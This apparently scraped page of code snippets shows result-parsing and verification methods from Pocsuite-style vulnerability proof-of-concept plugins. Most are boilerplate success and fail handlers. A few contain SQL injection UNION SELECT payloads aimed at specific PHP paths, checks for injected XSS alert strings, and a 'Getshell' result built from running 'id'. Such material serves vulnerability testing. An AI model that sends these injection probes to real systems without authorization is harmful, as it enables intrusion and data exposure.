def parse_attack(self, result):
     output = Output(self)
     if result:
         output.success(result)
     else:
         output.fail('Not vulnerable')
     return output
 def parse_attack(self, result):
     output = Output(self)
     if result:
         output.success(result)
     else:
         output.fail('Internet nothing returned')
     return output
 def parse_output( self, result ):
     output = Output(self)
     if result:
         output.success(result)
     else:
         output.fail('Error')
     return output
    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('failed')

        return output
Пример #5
0
 def parse_attack(self, response):
     output = Output(self)
     result = {}
     if response:
         result['FileInfo'] = {}
         result['FileInfo']['Filename'] = response
         result['FileInfo']['Filecontent'] = 'test123' * 10
         output.success(result)
     else:
         output.fail('Internet Nothing returned')
     return output
 def parse_verify(self, result):
     output = Output(self)
     if result:
         output.success(result)
     else:
         output.fail('Internet Nothing returned')
     return output
Пример #7
0
 def parse_output(self, result):
     output = Output(self)
     if result:
         output.success(result)
     else:
         output.fail('Failed')
     return output
Пример #8
0
 def parse_attack(self, result):
     output = Output(self)
     if result:
         output.success(result)
     else:
         output.fail("someting error")
     return output
 def parse_attack(self, result):
     output = Output(self)
     if result:
         output.success(result)
     else:
         output.fail('Not vulnerable')
     return output
Пример #10
0
	def parse_result(self, result):
		output = Output(self)
		if result:
			output.success(result)
		else:
			output.fail("Internet Nothing returned")
		return output
Пример #11
0
 def parse_attack(self, result):
     output = Output(self)
     if result:
         output.success(result)
     else:
         output.fail('Internet nothing returned')
     return output
Пример #12
0
 def parse_attack(self, result):
     output = Output(self)
     if result['result']['result'] == 'Exploit Success.':
         output.success(result)
     else:
         reason = result['result']['result']
         print("\033[0;31m%s\033[0m" % reason)
         output.fail('Exploit failed')
     return output
Пример #13
0
 def parse_verify(self, res):
     output = Output(self)
     result = {}
     if "HOSTS" in res.content and "DNS" in res.content:
         result['VerifyInfo'] = {}
         result['VerifyInfo']['URL'] = res.url
         output.success(result)
     else:
         output.fail('No vulnerability found.')
     return output
Пример #14
0
 def parse_verify(self, res):
     output = Output(self)
     result = {}
     if '>alert(/SebugTest/)' in res.content:
         result['VerifyInfo'] = {}
         result['VerifyInfo']['URL'] = self.url
         output.success(result)
     else:
         output.fail('Internet Nothing returned')
     return output
Пример #15
0
 def parse_verify(self, res, payload, type):
     output = Output(self)
     result = {}
     if type == 'xss' and '>alert(/Dirorder/)<' in res.content:
         result['VerifyInfo'] = {}
         result['VerifyInfo']['URL'] = urljoin(self.url, payload)
         output.success(result)
     else:
         output.fail('Internet Nothing returned')
     return output
Пример #16
0
 def parse_verify(self, res, payload, type):
     output = Output(self)
     result = {}
     if  type == 'xss' and '>alert(/Sebug23333Test/)' in res.content:
         #返回页面包含构造的特殊字段,说明xss存在
         result['VerifyInfo'] = {}
         result['VerifyInfo']['URL'] = urljoin(self.url, payload)
         output.success(result)           
     else:
         output.fail('Internet Nothing returned')
     return output
Пример #17
0
 def parse_attack(self, response):
     output = Output(self)
     result = {}
     if response:
         result['FileInfo'] = {}
         result['FileInfo']['Filename'] = response
         result['FileInfo']['Filecontent'] = 'test123' * 10
         output.success(result)
     else:
         output.fail('Internet Nothing returned')
     return output
Пример #18
0
    def parse_verify(self, res):
        output = Output(self)
        result = {}
        if res.status_code == 200 and "PHP Version" in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = res.url
            output.success(result)
        else:
            output.fail('No vulnerability found.')

        return output
Пример #19
0
 def parse_attack(self, content):
     output = Output(self)
     result = {}
     if content:
         result['result'] = {}
         result['result']['command'] = 'id'
         result['result']['result'] = content
         output.success(result)
     else:
         output.fail('Getshell failed')
     return output
    def parse_attack(self, response):
        output = Output(self)
        result = {}

        if response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = '%s' % self.url
            output.success(result)
        else:
            output.fail('Fail test')

        return output
Пример #21
0
    def parse_verify(self, flag):
        output = Output(self)
        result = {}

        if flag:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = res.url
            output.success(result)

        else:
            output.fail('No vulnerability found.')

        return output
    def parse_verify(self, res, payload):
        output = Output(self)
        result = {}

        if '4beed3b9c4a886067de0e3a094246f78' in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = urljoin(self.url, payload)
            output.success(result)

        else:
            output.fail('Internet Nothing returned')

        return output
 def _verify(self):
     output = Output(self)
     result = {}
     payload = "/index.php?page=view&id=-511 UNION SELECT 1,md5(666),3,4,5,6,7,8--"
     verify_url = self.url + payload
     content = req.get(verify_url).content
     if 'fae0b27c451c728867a567e8c1bb4e53' in content:
         result['VerifyInfo'] = {}
         result['VerifyInfo']['URL'] = verify_url
         output.success(result)
     else:
         output.fail('SQL Injection Failed')
     return output
Пример #24
0
    def parse_verify(self, res):
        output = Output(self)
        result = {}

        if res.status_code == 200 and '<h1>SEBUG@NET</h1>' in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = res.url
            output.success(result)

        else:
            output.fail('Internet Nothing returned')

        return output
Пример #25
0
 def _verify(self):
     output = Output(self)
     result = {}
     #根据Pocsuite格式要求,定义一个特殊输出字符串,验证sql注入是否成功
     payload = "/admin/index.php?id=-1 UNION SELECT 1,CONCAT(0x7165696a71,CAST(md5(23333) AS CHAR),0x20),3,4,5,6,7 FROM dc_user"
     verify_url = self.url + payload
     content = req.get(verify_url).content
     if "qeijq0ba7bc92fcd57e337ebb9e74308c811f" in content:
         result['VerifyInfo'] = {}
         result['VerifyInfo']['URL'] = verify_url
         output.success(result)
     else:
         output.fail('SQL Injection Failed')
     return output
Пример #26
0
    def parse_output(self, response):
        output = Output(self)
        result = {}

        if response:
            m = re.search(r'c4ca4238a0b923820dcc509a6f75849b', response.content)
            if m:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = response.url
                output.success(result)
        else:
            output.fail('Internet Nothing Returned')

        return output